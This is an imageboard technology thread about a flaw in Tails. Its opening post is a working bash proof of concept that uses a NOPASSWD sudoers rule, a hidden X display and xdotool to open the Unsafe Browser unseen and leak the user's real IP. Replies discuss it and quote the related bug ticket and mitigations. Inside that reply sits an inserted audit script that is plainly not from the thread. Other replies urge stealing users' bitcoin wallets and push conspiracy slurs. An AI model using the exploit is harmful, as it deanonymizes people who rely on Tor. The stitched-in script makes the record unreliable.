/tech/ - Technology

 No.1039972>>1040103 >>1040281

Because of a sudoers.d rule to allow running sudo unsafe-browser with NOPASSWD, this example script can run in the background and leak your public IP with no interaction or indication it's happening. No privilege escalation needed.


#!/bin/bash

export DISPLAY=:69
mv /run/user/1000/bus{,.bak}

Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1

sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &

xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return

xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return

xdotool search --sync --name Your getwindowname | awk '{print $5}'

mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0

 No.1039976>>1039977

Tails is just debian with iptables and an upgrade program included


 No.1039977>>1040089

>>1039976

that's literally every linux distro ever


 No.1039979>>1040030

>this example script can run in the background

how's that going to happen exactly?

>leak your public IP

>www.yourip.us

just have it connect to a server set up to listen for such requests.

what is that server going to do with this information? If it can't be correlated with anything, it's just "someone ran Tails on this IP"


 No.1040024>>1040198

this is why whonix style is superior

always have a workstation vm and a gateway vm

ensure the workstation only connects to the internet via tor ports, nat is disabled, everything firewalled off, etc.

no matter how much you fuck up on the workstation it will be nearly impossible to connect to anything outside of the tor ports on the gateway, short of an exploit allowing you to jump out of a VM, but then you're fucked anyway.


 No.1040030>>1040031

>>1039979

That's just an example, you can do worse things, you just need to compromise the amnesia account first, which I consider gameover anyway.

>how's that going to happen exactly?

It uses x fuckery to run hidden gui programs and xdotool to simulate mouse and keyboard presses. The script just navigates to www.yourip.us in the unsafe browser and reads the window name, all while it's hidden from view


 No.1040031>>1040194

>>1040030

Is the point of this thread that executing untrusted scripts in Tails can be dangerous?


 No.1040069>>1040202

>not using heads

https://heads.dyne.org/


 No.1040089

>>1039977

>$ Xvfb

<-bash: Xvfb: command not found

>$ xdotool

<-bash: xdotool: command not found


 No.1040103

>>1039972 (OP)

>installing sudo

>installing *bus

>installing zenity

>using any of that bloat to open your attack surface up

Isn't that supposed to be an operating system for security/privacy? Where's the statically compiled musl? Where's the GRSEC and RBAC? Is this a joke?


 No.1040116

i become curl | bash destroyer of noobs


 No.1040121>>1040797

UNIX has more holes than Swiss cheese.

Subject: Re: UNIX (In)Security

> From: AB
>
> I'm trying to convince my favorite TLA official that
> putting data on a UNIX machine on the TLA network is about
> as secure as posting it to alt.flame. Does anyone have a
> document on UNIX (in)security I could pass on?

alt.flame would be inappropriate if the material in question
isn't a flame or a response to one. I suggest tla.bboard if
the data is about things of general interest (like how much
certain people make).

Or, you could just put it up for anonymous ftp with the X
sources (eww!) on export.eve.rcl.ear. Then post a "ThE
sEkrIt Tla dATa yoU hAve BeEn waItInG foR is ON
eXpoRt.eve.rcl.ear" message to misc.wanted.

Seriously, look at the Kerberos papers. Look at the Orange
Book (trusted systems evaluation manual from the NCSC).
Realize that Unix security is like swiss cheese - not a
Jarlsberg or other cheese with a few big holes in it, but an
Alpine Lace cheese with thousands of tiny holes in it which
you could never plug all of. You can wrap it in saran wrap,
but you've still done nothing for the underlying structure,
save for reducing the rate at which mold grows on it.


 No.1040194

>>1040031

the point is that tails claims the amnesia user can't leak your real IP without escalating to another user (priv escalation exploit). The OP shows it can.


 No.1040195

sudo rm /etc/sudoers.d/zzz_unsafe-browser

issue fixed


 No.1040198

>>1040024

This.

Allowing access to the regular internet is just an accident waiting to happen.


 No.1040199

There has been a ticket for this for almost a year but it's been ignored.

https://redmine.tails.boum.org/code/issues/15635

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist1 for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I've seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.

Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.

Attempt captive portal detection2 to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents3. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser

[2]: https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection

[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/
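An added audit helper (not from the thread or the Tails project) that checks the two conditions the ticket's mitigations target: a NOPASSWD rule in a sudoers fragment and an unlocked clearnet account. The sudoers line and the shadow-style lines are constructed samples, not the real Tails files.

```shell
#!/bin/sh
# Added audit helper for the Unsafe Browser issue; not Tails' own code.
# It only inspects text it is given, so it runs offline on any system.

# Count NOPASSWD rules in a sudoers fragment, ignoring comments.
# A nonzero count means some command runs under sudo without a prompt.
count_nopasswd() {
    sed 's/#.*//' "$1" | grep -c 'NOPASSWD' || true
}

# Given one shadow(5)-style line, succeed (exit 0) when the account is
# locked, i.e. its password field starts with "!" or "*".
account_locked() {
    hash=$(printf '%s\n' "$1" | cut -d: -f2)
    case "$hash" in
        '!'*|'*'*) return 0 ;;
        *)         return 1 ;;
    esac
}

# "risky" when a NOPASSWD rule exists AND the target account is usable;
# "ok" otherwise (no rule, or the account is locked as mitigation 1 asks).
assess() {
    n=$(count_nopasswd "$1")
    if [ "$n" -gt 0 ] && ! account_locked "$2"; then
        echo risky
    else
        echo ok
    fi
}

# Constructed sample shaped like a sudoers.d fragment (assumed, not real).
SAMPLE_SUDOERS=$(mktemp)
cat > "$SAMPLE_SUDOERS" <<'EOF'
# let the desktop user launch the Unsafe Browser as the clearnet user
amnesia ALL = (clearnet) NOPASSWD: /usr/local/sbin/unsafe-browser
EOF

# Constructed shadow-style lines: locked ("!") and unlocked (has a hash).
LOCKED_LINE='clearnet:!:18000:0:99999:7:::'
UNLOCKED_LINE='clearnet:$6$saltsalt$fakehashvalue:18000:0:99999:7:::'

assess "$SAMPLE_SUDOERS" "$UNLOCKED_LINE"   # risky
assess "$SAMPLE_SUDOERS" "$LOCKED_LINE"     # ok
```

On a live system the same functions can be pointed at /etc/sudoers.d/* and the clearnet line from /etc/shadow instead of the constructed samples.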


 No.1040202>>1040210

>>1040069

I wouldn't trust heads, an early version had the controlport open for Tor without a filter/whitelist and a simple GETINFO address to the Tor controlport would reveal your true IP. It's since been fixed but that's an amateur mistake.


 No.1040208

Who cares about their IP? If you can get RCE on a tails user, go for the electrum/bitcoin wallet. 90% of people who use tails are drug dealers/buyers.

Before https://www.reddit.com/r/darknetmarketsnoobs was banned, it had thousands of viewers a day and all the posts were mostly normies having issues running Tails.


 No.1040210

>>1040202

Also, a simple priv escalation bug just was fixed in the latest version of heads 0.4. Updates weren't even GPG signed. Use heads with caution.


 No.1040217>>1040219 >>1040283

How does tails get millions of dollars in donations? I literally made something that works exactly like tails with debian live-build in 3 days with a few hours of work a day. It didn't have the auto update infrastructure but still. It was the same way that tails builds images, through debian live-build scripts with a packagelist and preconfigured configs.


 No.1040219

>>1040217

How much are you paying your shills? How many news sites have you had publish a shill piece on it?

At least you can reap some benefits from security by obscurity.


 No.1040281>>1040307

>>1039972 (OP)

>trusting Tails Amnesia just because Ed "the Clown In America who used his NSA clearance to fuck with the NSA ops as former CIA double-acting baking soda agent" told them he uses it and he's famous like there's 3 movies about him and big posters looking like he's 2013 Che Guevara.

>trusting Tails ever

>Qubes

>Tor project

>Securedrop

>not looking closely into his family tree

>easy mode : wiki pedia

"Let's shill a justwerks (((anonymous))) system pack for pesky journalists, traitorous insiders, and whistleblowers that are against or a threat to our agendas. Now that they watched those movies of their rockstar super hero Snowden or even most of his speeches they'll fall to memetics and quickly use and trust our tools like a tool (not a pun) and so that then we can kill these very threatening pesky pests so we can finally see the light in our grand agendas."

"say no more" -Ed


 No.1040283

>>1040217

Slush fund from the big 3

>soros, roths, rocks (exclude saudis since they sided with trumpo)


 No.1040307

>>1040281

Notice how this NSA shill spreads FUD without backing up his claims or even offering secure alternatives to what he perceives as a honeypot. Begone officer.


 No.1040797>>1040811

>>1040121

Windows has more holes than the average claim on /tech/ but life goes on. Also linux is not unix.


 No.1040811

>>1040797

>Windows has more holes than the average claim on /tech/ but life goes on.

Are you a Microsoft shill, else why are you bringing up Windows?

>Also linux is not unix.

Correct, but it and the user spaces that are commonly paired with it are UNIX-like.

